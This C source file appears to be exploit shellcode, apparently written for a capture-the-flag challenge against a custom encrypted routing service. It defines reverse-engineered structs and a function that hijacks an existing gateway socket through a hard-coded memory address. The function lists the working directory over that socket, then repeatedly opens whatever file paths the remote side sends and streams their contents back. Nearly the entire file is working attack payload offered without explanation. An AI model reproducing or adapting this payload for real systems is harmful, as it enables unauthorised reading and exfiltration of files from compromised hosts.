#include <stdint.h>

int openat(int dirfd, const char *pathname, int flags);

#define AT_FDCWD (-100)
#define O_RDONLY 0x0000

typedef uint64_t size_t;
typedef int64_t ssize_t;

ssize_t read(int fd, void *buf, size_t count);
ssize_t write(int fd, const void *buf, size_t count);
int open(const char *pathname, int flags);
int close(int fd);

struct linux_dirent {
    unsigned long  d_ino;     /* Inode number */
    unsigned long  d_off;     /* Offset to next linux_dirent */
    unsigned short d_reclen;  /* Length of this linux_dirent */
    char           d_name[];  /* Filename (null-terminated) */
                        /* length is actually (d_reclen - 2 -
                           offsetof(struct linux_dirent, d_name) */
    /*
    char           pad;       // Zero padding byte
    char           d_type;    // File type (only since Linux 2.6.4;
                              // offset is (d_reclen - 1))
    */

};

int getdents(unsigned int fd, struct linux_dirent *dirp,
             unsigned int count);
void exit(int status);

typedef uint64_t _QWORD;
typedef int8_t __int8;
typedef int64_t __int64;
typedef int32_t __int32;

struct __attribute__((aligned(8))) scomm_chan
{
  unsigned int dec_round_keys[60];
  unsigned int enc_round_keys[60];
  uint8_t dec_key[16];
  uint8_t enc_key[16];
  char iv[16];
  int fd;
  int padding;
};

typedef int16_t sa_family_t;
typedef int16_t in_port_t;
typedef int32_t in_addr;

struct sockaddr_in
{
  sa_family_t sin_family;
  in_port_t sin_port;
  in_addr sin_addr;
  uint8_t sin_zero[8];
};

struct __attribute__((aligned(8))) scomm_peer
{
  __int64 gw_addr;
  struct sockaddr_in sockadd_in;
  struct scomm_chan chan;
};

struct route
{
  unsigned int nb_addrs;
  int cap;
  __int64 *addrs;
  struct scomm_peer *gateway;
};

struct __attribute__((aligned(8))) routing_tbl
{
  __int32 nb_routes;
  __int32 capacity;
  struct route *routes;
  struct transmitter_list_node *xmitter_list_hd;
};

struct __attribute__((aligned(8))) config
{
  _QWORD opt_i;
  _QWORD self_addr;
  unsigned int listening_port;
  int field_14;
  struct routing_tbl routing_tbl;
/*
  struct receiver_list_node *receivers_list_hd;
  struct genPrime_t genPrime_s;
  struct scomm_chan listen_chan;
  struct scomm_peer *peers;
  _BYTE act_as_CC;
*/
};

const char err_open[] = "open failed";
const char err_openat[] = "openat failed";

void sc()
{
    int n, namelen;
    char buf[4096];
    struct config *cfg = *(struct config **) 0x6D7100;
    int s = cfg->routing_tbl.routes[0].gateway->chan.fd;
    int fd;

    write(s, "hello", 5);

    fd = openat(AT_FDCWD, ".", O_RDONLY);

    if (fd < 0) {
        write(s, err_openat, sizeof(err_openat));
        return;
    }

    write(s, "list", 4);

    while ((n = getdents(fd, (void *) buf, 4096)) > 0) {
        write(s, buf, n);
    }

    close(fd);

    for (;;) {

        if ((n = read(s, buf, 4095)) > 0) {

            if ('k' == buf[0] &&
                'i' == buf[1] &&
                'l' == buf[2] &&
                'l' == buf[3])
                exit(0); // filtered by seccomp, but will cause SIGSYS

            buf[n] = 0;

            fd = open(buf, O_RDONLY);

            if (fd < 0) {
                write(s, err_open, sizeof(err_open));
                continue;
            }

            write(s, "dump", 4);

            while ((n = read(fd, buf, 4096)) > 0) {
                write(s, buf, n);
            }

            close(fd);
        }
    }
}

